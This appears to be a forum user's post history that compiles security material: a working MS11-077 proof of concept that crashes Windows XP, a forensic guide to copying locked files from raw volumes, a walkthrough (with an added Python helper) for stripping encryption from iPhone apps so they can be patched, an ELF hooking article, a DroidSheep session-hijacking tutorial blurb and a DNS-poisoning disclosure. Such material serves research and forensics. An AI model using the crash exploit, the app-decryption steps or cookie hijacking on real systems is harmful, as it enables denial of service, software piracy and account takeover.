Everything posted by Nytro
-
MS11-077 Win32k Null Pointer De-reference Vulnerability POC

    # Exploit Title: MS11-077 Win32k Null Pointer De-reference Vulnerability POC
    # Date: 10/19/2011
    # Author: KiDebug
    # Version: Windows XP SP3 32bit
    # Tested on: Windows XP SP3 32bit
    # CVE : CVE-2011-1985

Exploit code. A single line of code is enough to cause a BSOD:

    #include <Windows.h>

    /* Sends CB_ADDSTRING to window handle -1. win32k dereferences the invalid
       window pointer in NtUserfnINCBOXSTRING (ecx = 0xffffffff in the dump
       below) and the machine bugchecks. */
    int main(void)
    {
        SendMessageCallback((HWND)-1, CB_ADDSTRING, 0, 0, 0, 0);
        return 0;
    }

or:

    #include <Windows.h>

    int main(void)
    {
        SendNotifyMessage((HWND)-1, CB_ADDSTRING, 0, 0);
        return 0;
    }

These messages can also cause a BSOD:

    // CB_ADDSTRING          0x0143
    // CB_INSERTSTRING       0x014A
    // CB_FINDSTRING         0x014C
    // CB_SELECTSTRING       0x014D
    // CB_FINDSTRINGEXACT    0x0158
    // LB_ADDSTRING          0x0180
    // LB_INSERTSTRING       0x0181
    // LB_SELECTSTRING       0x018C
    // LB_FINDSTRING         0x018F
    // LB_FINDSTRINGEXACT    0x01A2
    // LB_INSERTSTRINGUPPER  0x01AA
    // LB_INSERTSTRINGLOWER  0x01AB
    // LB_ADDSTRINGUPPER     0x01AC
    // LB_ADDSTRINGLOWER     0x01AD

WinDbg output at the crash:

    0: kd> r
    eax=0000001b ebx=ee0af1fa ecx=ffffffff edx=bbdd0650 esi=ffffffff edi=ee21fd64
    eip=bf914e9b esp=ee21fd08 ebp=ee21fd08 iopl=0         nv up ei pl nz na pe nc
    cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010206
    win32k!NtUserfnINCBOXSTRING+0x8:
    bf914e9b 8b4120          mov     eax,dword ptr [ecx+20h] ds:0023:0000001f=????????
    0: kd> kp
    ChildEBP RetAddr
    ee21fd08 bf80ef2b win32k!NtUserfnINCBOXSTRING+0x8
    ee21fd40 8054261c win32k!NtUserMessageCall+0xae
    ee21fd40 7c92e4f4 nt!KiFastCallEntry+0xfc
    0012ff2c 77d194be ntdll!KiFastSystemCallRet
    0012ff5c 00401015 USER32!NtUserMessageCall+0xc
    0012ff78 0040114c 1!main(void)+0x15 [r:\temp\1\1.cpp @ 6]
    0012ffc0 7c817067 1!__tmainCRTStartup(void)+0x10b [f:\dd\vctools\crt_bld\self_x86\crt\src\crt0.c @ 278]
    0012fff0 00000000 kernel32!BaseProcessStart+0x23

Source: MS11-077 Win32k Null Pointer De-reference Vulnerability POC
-
How to acquire "locked" files from a running Windows system
By Par Osterberg Medina. Tuesday, October 25, 2011

Windows systems offer a variety of special files that contain important pieces of information for a forensic investigation. Some obvious examples are pagefile.sys, the event logs, the registry hives, and NTFS metadata files such as the Master File Table ($MFT). It is a common misconception among forensic investigators and incident responders that collecting these files from a live system is cumbersome or impossible from the command line. In this blog post I will show a couple of different ways to bypass the lock that Windows holds on these files, which makes it possible to acquire them from a running system.

You have most likely found yourself in the situation where you wanted to copy a file from a running Windows system, only to be greeted with the infamous "File in Use" dialog box. This is Windows' way of ensuring that the file is not changed by another process while we are copying it, so that we are not left with a distorted copy. To succeed with the copy operation we need to read the volume the file resides on directly, by referring to it through the Win32 device namespace (also called "DOS devices").

Win32 Device Namespace

The "\\.\" prefix selects the Win32 device namespace instead of the Win32 file namespace, which gives direct access to physical disks and volumes without going through the file system's sharing checks. Opening a volume this way requires administrative privileges. To illustrate how the process is carried out I will use a tool from Microsoft called 'nfi' (NTFS File Sector Information Utility).

Identifying Sector Addresses

This particular tool is included in the OEM Support Tools for NT 4.0 and Windows 2000 and was originally released on June 23, 2000.
'nfi' queries the NTFS file system for information about a file or about a specific sector address in the file system. A sector is the smallest addressable unit on a hard drive and its size is set by the drive manufacturer (512 bytes on this system, which is why the dd command below uses bs=512). One important piece of information that 'nfi' gives us is the addresses of the sectors of the file we want to acquire. In the following example, on a 64-bit version of Windows 7, we first create a file (foundstone.txt) and then view its NTFS properties using 'nfi':

    C:\>ver
    Microsoft Windows [Version 6.1.7601]

    C:\>FOR /L %i IN (1,1,20) DO @echo data data data data data data >> c:\foundstone.txt

    C:\>nfi.exe c:\foundstone.txt
    NTFS File Sector Information Utility.
    Copyright (C) Microsoft Corporation 1999. All rights reserved.

    \foundstone.txt
        $STANDARD_INFORMATION (resident)
        $FILE_NAME (resident)
        $FILE_NAME (resident)
        $DATA (nonresident)
            logical sectors 7357616-7357623 (0x7044b0-0x7044b7)

Notice the last line: it tells us that foundstone.txt is located on logical sectors 7357616-7357623, that is, eight 512-byte sectors (4 KiB) even though the file itself is only 620 bytes. With this information we can carve the file out of the file system, a technique commonly referred to as "disk carving" that is used quite extensively in computer forensics.

Disk Carving

The tool of choice for disk carving is 'dd', the "Swiss army knife" of disk-based forensics. In this example I will be using the version of 'dd' included in the Forensic Acquisition Utilities (FAU) written by George M. Garner Jr. First we specify the Win32 device namespace of our volume as the input file ("if") and the sector size as the block size ("bs"). We also specify where on the volume to start carving ("skip", counted in blocks) and how many blocks to read ("count"). The option 'conv=noerror' tells the program not to stop if it encounters a read error. Below the output is also piped into hexdump so it is a little easier to read.
    C:\>dd.exe if=\\.\c: skip=7357616 bs=512 count=8 conv=noerror |hexdump
    0000000: 6461 7461 2064 6174 6120 6461 7461 2064  data data data d
    0000010: 6174 6120 6461 7461 2064 6174 6120 0a64  ata data data .d
    0000020: 6174 6120 6461 7461 2064 6174 6120 6461  ata data data da
    0000030: 7461 2064 6174 6120 6461 7461 200a 6461  ta data data .da
    0000040: 7461 2064 6174 6120 6461 7461 2064 6174  ta data data dat
    0000050: 6120 6461 7461 2064 6174 6120 0a64 6174  a data data .dat
    0000060: 6120 6461 7461 2064 6174 6120 6461 7461  a data data data
    0000070: 2064 6174 6120 6461 7461 200a 6461 7461   data data .data
    0000080: 2064 6174 6120 6461 7461 2064 6174 6120   data data data 
    0000090: 6461 7461 2064 6174 6120 0a64 6174 6120  data data .data 
    00000a0: 6461 7461 2064 6174 6120 6461 7461 2064  data data data d
    00000b0: 6174 6120 6461 7461 200a 6461 7461 2064  ata data .data d
    00000c0: 6174 6120 6461 7461 2064 6174 6120 6461  ata data data da
    00000d0: 7461 2064 6174 6120 0a64 6174 6120 6461  ta data .data da
    00000e0: 7461 2064 6174 6120 6461 7461 2064 6174  ta data data dat
    00000f0: 6120 6461 7461 200a 6461 7461 2064 6174  a data .data dat
    0000100: 6120 6461 7461 2064 6174 6120 6461 7461  a data data data
    0000110: 2064 6174 6120 0a64 6174 6120 6461 7461   data .data data
    0000120: 2064 6174 6120 6461 7461 2064 6174 6120   data data data 
    0000130: 6461 7461 200a 6461 7461 2064 6174 6120  data .data data 
    0000140: 6461 7461 2064 6174 6120 6461 7461 2064  data data data d
    0000150: 6174 6120 0a64 6174 6120 6461 7461 2064  ata .data data d
    0000160: 6174 6120 6461 7461 2064 6174 6120 6461  ata data data da
    0000170: 7461 200a 6461 7461 2064 6174 6120 6461  ta .data data da
    0000180: 7461 2064 6174 6120 6461 7461 2064 6174  ta data data dat
    0000190: 6120 0a64 6174 6120 6461 7461 2064 6174  a .data data dat
    00001a0: 6120 6461 7461 2064 6174 6120 6461 7461  a data data data
    00001b0: 200a 6461 7461 2064 6174 6120 6461 7461   .data data data
    00001c0: 2064 6174 6120 6461 7461 2064 6174 6120   data data data 
    00001d0: 0a64 6174 6120 6461 7461 2064 6174 6120  .data data data 
    00001e0: 6461 7461 2064 6174 6120 6461 7461 200a  data data data .
    00001f0: 6461 7461 2064 6174 6120 6461 7461 2064  data data data d
    0000200: 6174 6120 6461 7461 2064 6174 6120 0a64  ata data data .d
    0000210: 6174 6120 6461 7461 2064 6174 6120 6461  ata data data da
    0000220: 7461 2064 6174 6120 6461 7461 200a 6461  ta data data .da
    0000230: 7461 2064 6174 6120 6461 7461 2064 6174  ta data data dat
    0000240: 6120 6461 7461 2064 6174 6120 0a64 6174  a data data .dat
    0000250: 6120 6461 7461 2064 6174 6120 6461 7461  a data data data
    0000260: 2064 6174 6120 6461 7461 200a 0000 0000   data data .....
    0000270: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    0000280: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    0000290: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    00002a0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    00002b0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    00002c0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    00002d0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    00002e0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    00002f0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    0000300: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    0000310: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    0000320: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    0000330: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    0000340: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    0000350: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    0000360: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    0000370: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    0000380: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    0000390: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    00003a0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    00003b0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    00003c0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    00003d0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    00003e0: 0000 0000 0000 0000 0000 0000 7275 653b  ............rue;
    00003f0: 7d3b 7362 5f67 683d 6675 6e63 7469 6f6e  };sb_gh=function
    0000400: 2829 7b72 6574 7572 6e20 6c6f 6361 7469  (){return locati
    0000410: 6f6e 2e68 6173 687d 3b73 625f 7368 3d66  on.hash};sb_sh=f
    0000420: 756e 6374 696f 6e28 6129 7b6c 6f63 6174  unction(a){locat
    0000430: 696f 6e2e 6861 7368 3d61 7d3b 5f77 3d77  ion.hash=a};_w=w
    0000440: 696e 646f 773b 5f64 3d64 6f63 756d 656e  indow;_d=documen
    0000450: 743b 7362 5f64 653d 5f64 2e64 6f63 756d  t;sb_de=_d.docum
    0000460: 656e 7445 6c65 6d65 6e74 3b73 625f 6965  entElement;sb_ie
    0000470: 3d21 215f 772e 4163 7469 7665 584f 626a  =!!_w.ActiveXObj

(count=8 with bs=512 reads 4096 bytes; the original post stops the listing at offset 0x47f.)

As you can see, data is still printed to stdout after the contents of our file have ended (the file is 620 bytes and ends at offset 0x26b). The reason is that a file occupies sectors in fixed-size, aligned groups. Such a group of sectors is called a cluster, and the bytes between the end of the file and the end of its last cluster are referred to as slack space: remnants of old files that previously occupied the sectors now allocated to our file (here, part of a JavaScript file). As a side note, and an interesting detail from a forensic standpoint, reading the volume this way modifies no timestamps on the file.

Using icat and ifind

Now that we know the basics of acquiring a file through the Win32 device namespace, let's look at a more automated way of doing it. Another way to get files off the system (without worrying about slack space at the end of the file and without manually calculating where the clusters start and end) is to use the utilities 'ifind' and 'icat' from Brian Carrier's The Sleuth Kit. The Sleuth Kit, in my opinion, is the best and most flexible forensic toolkit available, and it is open source.
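As an added example that is not part of the original post, here is the nfi-then-dd step above in script form: it parses the "logical sectors" lines of nfi output into runs, reads those sectors from a raw volume handle with the same arithmetic as the dd command (skip*bs, count*bs), and splits the result at the logical file size so that the slack comes back separately, which is what icat does for you in the next section. The volume is a constructed in-memory image, not the disk from the post, and the sector numbers in NFI_SAMPLE are made up to fit it.

```python
import io
import re

SECTOR_SIZE = 512          # the unit nfi reports in; bs=512 in the dd command above
CLUSTER_SECTORS = 8        # 4 KiB clusters, the NTFS default

NFI_RUN = re.compile(r"logical sectors (\d+)-(\d+)")


def parse_nfi_runs(nfi_output):
    """Turn every 'logical sectors A-B' line of nfi output into a (start_sector, sector_count)
    run. A fragmented file prints several such lines; they come back in file order."""
    return [(int(a), int(b) - int(a) + 1) for a, b in NFI_RUN.findall(nfi_output)]


def read_sectors(volume, start_sector, sector_count, sector_size=SECTOR_SIZE):
    """The dd step: seek to start_sector*bs on the raw volume and read count*bs bytes.
    `volume` is any seekable binary stream: an image file, or on Windows
    open(r'\\.\C:', 'rb', buffering=0) run as administrator (unbuffered, so every
    read stays sector aligned as raw volume reads must)."""
    volume.seek(start_sector * sector_size)
    data = volume.read(sector_count * sector_size)
    if len(data) != sector_count * sector_size:
        raise IOError("short read at sector %d" % start_sector)
    return data


def carve_file(volume, runs, logical_size, sector_size=SECTOR_SIZE):
    """Read every run, then split at the logical file size: the first part is what
    icat gives you, the second is the slack (bytes after EOF up to the end of the
    last cluster) that dd returns as well."""
    raw = b"".join(read_sectors(volume, s, n, sector_size) for s, n in runs)
    if logical_size > len(raw):
        raise ValueError("file size exceeds the allocated sectors")
    return raw[:logical_size], raw[logical_size:]


# --- constructed sample volume, not a real disk --------------------------------
NFI_SAMPLE = """\
\\foundstone.txt
    $STANDARD_INFORMATION (resident)
    $FILE_NAME (resident)
    $DATA (nonresident)
        logical sectors 160-167 (0xa0-0xa7)
"""
CONTENT = b"data data data data data data \n" * 20   # 620 bytes, like the foundstone.txt above


def build_sample_volume():
    """A 128 KiB zero-filled volume in which cluster 20 (sectors 160-167) once held an
    old file (filled with 'OLD!') and now holds CONTENT; the rest of the cluster is slack."""
    vol = bytearray(256 * SECTOR_SIZE)
    start = 160 * SECTOR_SIZE
    vol[start:start + CLUSTER_SECTORS * SECTOR_SIZE] = b"OLD!" * (CLUSTER_SECTORS * SECTOR_SIZE // 4)
    vol[start:start + len(CONTENT)] = CONTENT
    return io.BytesIO(bytes(vol))


def demo():
    """Run the whole chain on the sample and return (runs, file_bytes, slack_bytes)."""
    volume = build_sample_volume()
    runs = parse_nfi_runs(NFI_SAMPLE)
    file_bytes, slack = carve_file(volume, runs, logical_size=len(CONTENT))
    return runs, file_bytes, slack


if __name__ == "__main__":
    runs, data, slack = demo()
    print("runs:", runs, "file:", len(data), "bytes, slack:", len(slack), "bytes")
```

On a live system, replace build_sample_volume() with the raw volume handle described in read_sectors, pass the real nfi output, and take the logical size from dir or os.path.getsize (both work on a locked file, since they only read metadata). The slack half is worth keeping in an investigation for exactly the reason the hexdump above shows.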
Given the volume and the path to the file, 'ifind' returns the entry number the file has in the $MFT. While this number is referred to as an $MFT entry on NTFS, it is called an inode on UNIX file systems, and that is the term The Sleuth Kit uses. For 'ifind' to work the full path must be given in UNIX style (forward slashes instead of backslashes and no drive letter at the beginning of the path). In this example we acquire the SECURITY registry hive from the running system, a file that is normally not accessible.

    C:\>ifind.exe -V
    The Sleuth Kit ver 3.2.3

    C:\>ifind.exe -n /windows/system32/config/security \\.\c:
    27392

Using the file's $MFT entry number as an argument to 'icat', we can easily carve the file out of the file system. 'icat' takes care of terminating the output where the file ends, but we need to redirect its output from stdout to wherever we want to store the file.

    C:\>icat.exe \\.\c: 27392 > c:\security.bin

    C:\>file.exe security.bin
    security.bin; MS Windows registry file, NT/2000 or above

Now that we know how to bypass Windows file locking, the only thing that remains is to automate the procedure so that we can include the "locked" files in our live data acquisition phase. I was going to post my wrapper script around 'ifind' and 'icat', but while researching on the Internet I found a much better tool called 'ntfscopy'.

ntfscopy

The tool is written by Jonathan Tomczak of TZWorks LLC and does exactly what we have discussed above, plus more. You can download it from http://tzworks.net.
Here are the options that 'ntfscopy' supports:

    usage:
      copying by filename
        ntfscopy.exe <src> <dst>                                   = live system
        ntfscopy.exe <src> <dst> -image <image> [-offset <offset>]
      other options that can be used w/ the above
        -raw                  = output raw clusters including slack space
        -meta                 = pull out metadata into separate file [<dst>.meta.txt]
        -skip_sparse_clusters = don't include sparse clusters in the output
        -md5                  = prepends last mod time to filename and appends md5 hash
      experimental options
        a. copying by logical cluster number (LCN)
           ntfscopy.exe -partition <drive> -cluster <lcn> <dst>
           ntfscopy.exe -image <image> [-offset <offset>] -cluster <lcn> <dst>
        b. copying from a VMWare virtual NTFS drive (limited)
           ntfscopy.exe <src> <dst> -vmdk <vmdk> [-vmdk <vmdk>]
        c. piping in which files to copy
           dir \* /b /s | ntfscopy.exe -pipe -md5

Here is an example of using 'ntfscopy' to acquire a copy of the $MFT from a live Windows system:

    C:\>ntfscopy.exe c:\$MFT c:\copy_of_MFT
    ntfscopy ver: 0.65, Copyright (c) TZWorks LLC
    copy successful

Forensic Get

Another tool that will get the job done is FGET, or Forensic Get, from HBGary, Inc. The program can not only acquire "locked" files from a local file system but also supports operation over the network. FGET and other free tools from HBGary can be downloaded from http://hbgary.com/free-tools. Below is an example of using FGET to acquire a copy of the $Mft:

    C:\>FGET.exe -extract c:\$Mft c:\copy_of_Mft2.bin
    -= FGET v1.0 - Forensic Data Acquisition Utility - (c)HBGary, Inc 2010 =-
    [+] Extracting File From Volume ...SUCCESS!

By including 'ntfscopy' or any of the other methods described above, forensic examiners and incident responders can acquire protected files from the command line. Examples of how to put everything together and automate it will be given in part II of this blog post.

Bio

Par Osterberg Medina has worked in computer security for over 15 years, with a background in both system administration and penetration testing.
Prior to joining Foundstone, Par spent 8 years as an Incident Handler for the Swedish GovCERT, investigating computer intrusions and coordinating security-related incidents. He specializes in malware analysis and memory forensics, finding rootkits that try to stay hidden in the operating system. He has conducted training and lectured on this subject all over the world at conferences such as FIRST and the GOVCERT.NL Symposium.

Source: http://blog.opensecurityresearch.com/2011/10/how-to-acquire-locked-files-from.html
-
Decrypting iPhone Apps
saurabh @ 13:57

This blog post steps through how to convert encrypted iPhone application bundles into plaintext application bundles that are easier to analyse.

Requirements:
1) A jailbroken iPhone with OpenSSH, gdb and other utilities (com.ericasadun.utilities etc.)
2) An iPhone app
3) On your machine: otool (comes with the iPhone SDK), a hex editor (0xED, HexWorkshop etc.) and IDA (versions 5.2 through 5.6 support remote debugging of iPhone applications through iphone_server)

For this article, I will use "blah" as the app name.

Some groundwork, taken from Apple's API docs [1, 2]: iPhone apps use the Mach-O (Mach Object) file format. The image below illustrates the file format at a high level (screenshot in the original post):

A Mach-O file contains three major regions:
1. At the beginning of every Mach-O file is a header structure that identifies the file as a Mach-O file. The header also contains other basic file type information, indicates the target architecture, and contains flags specifying options that affect the interpretation of the rest of the file.
2. Directly following the header is a series of variable-size load commands that specify the layout and linkage characteristics of the file. Among other information, the load commands can specify: the initial layout of the file in virtual memory; the location of the symbol table (used for dynamic linking); the initial execution state of the main thread of the program; the names of shared libraries that contain definitions for the main executable's imported symbols.
3. Following the load commands, all Mach-O files contain the data of one or more segments. Each segment contains zero or more sections. Each section of a segment contains code or data of some particular type. Each segment defines a region of virtual memory that the dynamic linker maps into the address space of the process. The exact number and layout of segments and sections is specified by the load commands and the file type.
In user-level fully linked Mach-O files, the last segment is the link edit segment. This segment contains the tables of link edit information, such as the symbol table, string table, and so forth, used by the dynamic loader to link an executable file or Mach-O bundle to its dependent libraries.

iPhone apps are normally encrypted and are decrypted by the loader at run time. One of the load commands (LC_ENCRYPTION_INFO, the one whose fields otool prints below) describes the encrypted region of the executable.

    Push EBP
    Mov EBP, ESP
    JMP loc_6969

    loc_6969:

Once you have downloaded and installed an app on your iPhone, make a copy of the actual executable on your machine.

Note 1: blah.app is not the actual executable; it is a folder. If you browse it you will find a binary file named blah, which is the actual application binary.

Note 2: To find the path where your application is installed, ssh onto your iPhone and run:

    sudo find / | grep blah.app

Once you have copied the app binary to your machine, follow the steps below (on your local machine). Open a terminal and type:

    otool -l blah | grep crypt

This assumes that the iPhone SDK or otool is already installed on your machine. The command prints the cryptid, cryptoff and cryptsize fields (shown as a screenshot in the original post). If cryptid is set to 1, the app is encrypted. cryptoff and cryptsize give the offset and size of the encrypted section respectively.

First we have to locate the cryptid in the binary and set it to zero, so that when we write the decrypted binary back and execute it on the iPhone, the loader does not attempt to decrypt it again. Open the binary in a hex editor. I did not come across any definite method of locating the cryptid. Once you have loaded the binary in the hex editor, search for "/System/Library/Frameworks". You should be able to locate it around offset 0x1000. In the line just above the very first instance of this string, you will find the bytes 01.
Flip it to 00 and save the file.

Note 3: In case you find multiple instances of 01, use the coin-tossing method of choosing between them.

Use otool again to query the crypt data. You will see that cryptid is now set to 0 (zero).

Next, we need to run the app installed on the iPhone and take a memory dump.

Note 4: The actual application code starts at 0x2000. The cryptsize in the case of our sample app is 942080 (0xE6000). Hence we add 0x2000 and 0xE6000: 0x2000 + 0xE6000 = 0xE8000. Therefore we need to dump the running process from 0x2000 to 0xE8000.

Now ssh onto your iPhone, run the target app and look up its process id with "ps -ax". Once you have the process id, use the following commands to dump the process:

    gdb -p PID
    dump memory blah.bin 0x2000 0xE8000

Once you have taken the memory dump, use the "quit" command to exit gdb. Use the following command to get the size of the memory dump:

    ls -l blah.bin

The size of this bin file should be exactly the same as the cryptsize of the original app. Refer to the screenshot above. Now pull this bin file onto your local machine.

On your local machine, load the bin file in a hex editor and copy everything (using select all or whatever). Close the file and open the original app in the hex editor (the file in which we modified cryptid from 01 to 00). If you remember, cryptoff was 4096, which is 0x1000 in hex. Go to file offset 0x1000 and make sure that your hex editor is in overwrite mode, not insert mode. Once you are at offset 0x1000, paste everything you copied from the bin file. This will overwrite the encrypted section with the decrypted one. Save the file and you are done.

Open the file in IDA Pro and you will see the difference between the encrypted and decrypted binaries. At this point you can easily reverse engineer the app and patch it.
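An added example, not from the original post, that replaces the hex-editor search for the 01 byte with a parse of the load commands: LC_ENCRYPTION_INFO (0x21; 0x2C for the 64-bit variant) carries cryptoff, cryptsize and cryptid, so the file offset of cryptid follows directly from the position of that command, and the same command says where the dumped region has to be pasted. The Mach-O returned by build_sample_binary() is constructed for the test, with a 16-byte stand-in region instead of a real encrypted __TEXT; fat binaries are not handled.

```python
import struct

MH_MAGIC, MH_MAGIC_64 = 0xFEEDFACE, 0xFEEDFACF
LC_ENCRYPTION_INFO, LC_ENCRYPTION_INFO_64 = 0x21, 0x2C
LC_UUID = 0x1B


def find_encryption_info(data):
    """Walk the load commands of a thin little-endian Mach-O and return the
    encryption_info_command fields plus the file offset of its cryptid field.
    Fat (0xCAFEBABE) binaries must be sliced to one architecture first."""
    magic = struct.unpack_from("<I", data, 0)[0]
    if magic == MH_MAGIC:
        header_size = 28
    elif magic == MH_MAGIC_64:
        header_size = 32
    else:
        raise ValueError("not a thin little-endian Mach-O: magic 0x%08x" % magic)
    ncmds = struct.unpack_from("<I", data, 16)[0]      # same offset in both header layouts
    off = header_size
    for _ in range(ncmds):
        cmd, cmdsize = struct.unpack_from("<II", data, off)
        if cmdsize < 8:
            raise ValueError("bad load command size at 0x%x" % off)
        if cmd in (LC_ENCRYPTION_INFO, LC_ENCRYPTION_INFO_64):
            cryptoff, cryptsize, cryptid = struct.unpack_from("<III", data, off + 8)
            return {"cryptoff": cryptoff, "cryptsize": cryptsize, "cryptid": cryptid,
                    "cryptid_offset": off + 16}
        off += cmdsize
    return None


def rebuild_decrypted(encrypted_binary, dumped_region):
    """The two hex-editor edits from the post, done by offset instead of by search:
    clear cryptid so the loader will not try to decrypt again, then overwrite the
    cryptsize bytes at cryptoff with the region dumped from the running process."""
    info = find_encryption_info(encrypted_binary)
    if info is None:
        raise ValueError("no LC_ENCRYPTION_INFO load command, nothing to decrypt")
    if info["cryptid"] == 0:
        raise ValueError("cryptid is already 0")
    if len(dumped_region) != info["cryptsize"]:
        raise ValueError("dump is %d bytes, cryptsize is %d" % (len(dumped_region), info["cryptsize"]))
    out = bytearray(encrypted_binary)
    struct.pack_into("<I", out, info["cryptid_offset"], 0)
    out[info["cryptoff"]:info["cryptoff"] + info["cryptsize"]] = dumped_region
    return bytes(out)


# --- constructed sample: a 96-byte 32-bit Mach-O with LC_UUID + LC_ENCRYPTION_INFO ---
PLAINTEXT = b"\x00\xf0\x20\xe3" * 4            # 16 stand-in bytes for the decrypted code
CRYPTOFF, CRYPTSIZE = 0x50, len(PLAINTEXT)


def build_sample_binary():
    """Header (magic, cputype 12 = ARM, subtype, MH_EXECUTE, ncmds=2, sizeofcmds, flags),
    an LC_UUID command to step over, then LC_ENCRYPTION_INFO with cryptid=1."""
    header = struct.pack("<7I", MH_MAGIC, 12, 9, 2, 2, 24 + 20, 0)
    uuid_cmd = struct.pack("<II", LC_UUID, 24) + b"\x11" * 16
    enc_cmd = struct.pack("<5I", LC_ENCRYPTION_INFO, 20, CRYPTOFF, CRYPTSIZE, 1)
    body = header + uuid_cmd + enc_cmd
    body += b"\x00" * (CRYPTOFF - len(body))
    return body + bytes(b ^ 0x5A for b in PLAINTEXT)   # "encrypted" stand-in, just XORed


if __name__ == "__main__":
    sample = build_sample_binary()
    print(find_encryption_info(sample))
    print(find_encryption_info(rebuild_decrypted(sample, PLAINTEXT)))
```

On a real app the call is rebuild_decrypted(open("blah", "rb").read(), open("blah.bin", "rb").read()), written back to a new file; the length check is the ls -l comparison from the post. The result still needs the ldid -s step below before it will launch on the device.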
The first image below shows an encrypted app and the second one a decrypted app (screenshots in the original post):

After patching the application, ssh onto the iPhone and upload it to the application directory, replacing the original binary with the patched one. Once uploaded, install a utility called "ldid" on your iPhone:

    apt-get install ldid

Finally, sign the patched binary using ldid:

    ldid -s blah

This will fix the code signature and you will be able to run the patched app on your iPhone.

References:
1) http://developer.apple.com/library/mac/#documentation/DeveloperTools/Conceptual/MachORuntime/Reference/reference.html
2) http://developer.apple.com/library/mac/#documentation/Darwin/Reference/ManPages/man1/otool.1.html

Source: http://www.sensepost.com/blog/6254.html
-
By what method does it inject, CreateRemoteThread?
-
As an atheist, I have nothing against the losers who come to kiss bones, but I do have something against the BOR (Biserica Ortodoxa Romana, the Romanian Orthodox Church) and the financial tricks they pull.
-
There are differences:
- the kernel version and the drivers for the supported network cards
- the driver patches for packet injection support (or whatever it is called)
- the versions of airmon/aircrack... besides the other utilities
So, at least in theory, 5 should have many pluses over 3.

PS: These differences are usually not very "visible"; maybe just that you use --channel instead of -c.
-
Redirecting functions in shared ELF libraries
By Apriorit Inc, Anthony Shoumikhin | 2 Apr 2010 | Unedited contribution

This article gives a brief description of the structure and functioning of ELF libraries and also shows how to intercept function calls from one library into another.

TABLE OF CONTENTS
1. The problem
  1.1 What does redirecting mean?
  1.2 Why redirecting?
2. Brief ELF explanation
  2.1 Which parts does an ELF file consist of?
  2.2 How do shared ELF libraries link?
  2.3 Some useful conclusions
3. The solution
  3.1 What is the algorithm of redirection?
  3.2 How to get the address a library has been loaded to?
  3.3 How to write and restore a new function address?
4. Instead of a conclusion
5. Useful links

1. The problem

We all use dynamic link libraries (DLLs). They have excellent properties. First, such a library is loaded into physical memory only once for all processes. Second, you can extend the functionality of a program by loading an additional library that provides it, without restarting the program. The updating problem is solved as well: it is possible to define a standard interface for the DLL and to change the functionality and quality of the base program by changing the version of the library. Such methods of code reuse came to be called a "plug-in architecture". But let's move on.

Of course, not every dynamic link library relies only on itself, that is, on the processor and the memory, for its implementation. Libraries use other libraries, or just the standard libraries. For example, programs in C/C++ use the standard C/C++ libraries, which are themselves organized in dynamic link form (libc.so and libstdc++.so). They are stored in files of a specific format. My research was done on Linux, where the main format of dynamic link libraries is ELF (Executable and Linkable Format).
Recently I faced the need to intercept function calls from one library into another, in order to process them in some way. This is called call redirecting.

1.1 What does redirecting mean?

First, let's formulate the problem on a concrete example. Suppose we have a program called "test" written in C (test.c) and two separate libraries (libtest1.c and libtest2.c) with fixed contents, compiled beforehand. These libraries provide the functions libtest1() and libtest2(), respectively. In their implementation each of them uses the puts() function from the C standard library. The task is the following:
- replace the call of puts() in both libraries with a call to a redirected puts() function, implemented in the master program (test.c), which can in turn use the original puts();
- undo the change, so that a repeated call of libtest1() and libtest2() again leads to the original puts().
It is not allowed to change the code or recompile the libraries. We can change only the master program.

Full article: http://www.codeproject.com/KB/library/elf-redirect.aspx
-
Howto Use Droidsheep - Tutorial

Description: This official tutorial for DroidSheep for Android shows how to use DroidSheep to capture sessions on your local network. DroidSheep runs on your Android device and listens to the network traffic. If it captures a session cookie, it shows it in a list and the user can simply use the victim's account without knowing their credentials.

Download DroidSheep: Droidsheep - Insecure Stuff

If you have any problems, contact me on Twitter: Twitter

Video: http://www.securitytube.net/video/2374
-
Great, so it is not a problem that I deleted the last digits (the referral) from your link, right?
-
I think it is --channel now instead of -c. That file is where the packets (not whole ones) needed to crack the password are saved. I don't know much in this area either; give it a file name that you will remember, you will use it with aircrack.
-
DNS poisoning via Port Exhaustion

Today we are releasing a very interesting whitepaper which describes a DNS poisoning attack against stub resolvers. It discloses two vulnerabilities:

- A vulnerability in Java (CVE-2011-3552, CVE-2010-4448) which enables remote DNS poisoning using Java applets. It can be triggered by opening a malicious web page. Successful exploitation may lead to disclosure and manipulation of cookies and web pages, disclosure of the NTLM credentials and clipboard data of the logged-on user, and even firewall bypass.
- A vulnerability in multi-user Windows environments which enables local DNS cache poisoning of arbitrary domains. It can be triggered by a normal user (i.e. one without administrative rights) in order to attack other users of the system. Successful exploitation may lead to information disclosure, privilege escalation, universal XSS and more.

The whitepaper can be found here: http://blog.watchfire.com/files/dnsp_port_exhaustion.pdf

A few video demos of our proof of concept:

Attack: Remote DNS poisoning via Java applets: cookie theft. Environment: Ubuntu 11.04, Firefox 7.0.1.
http://www.youtube.com/watch?v=eSEvFmsw55A

Attack: Remote DNS poisoning via Java applets: NTLM credentials and clipboard theft. Environment: Windows 2008, Internet Explorer 9.
http://www.youtube.com/watch?v=i-Fmk7-pFFA

Attack: Remote DNS poisoning via Java applets: firewall bypass. Environment: Windows 2008, Firefox 7.0.1.
http://www.youtube.com/watch?v=7CFq_pofeBU

Attack: Local DNS poisoning via port exhaustion. Environment: Windows 2008.
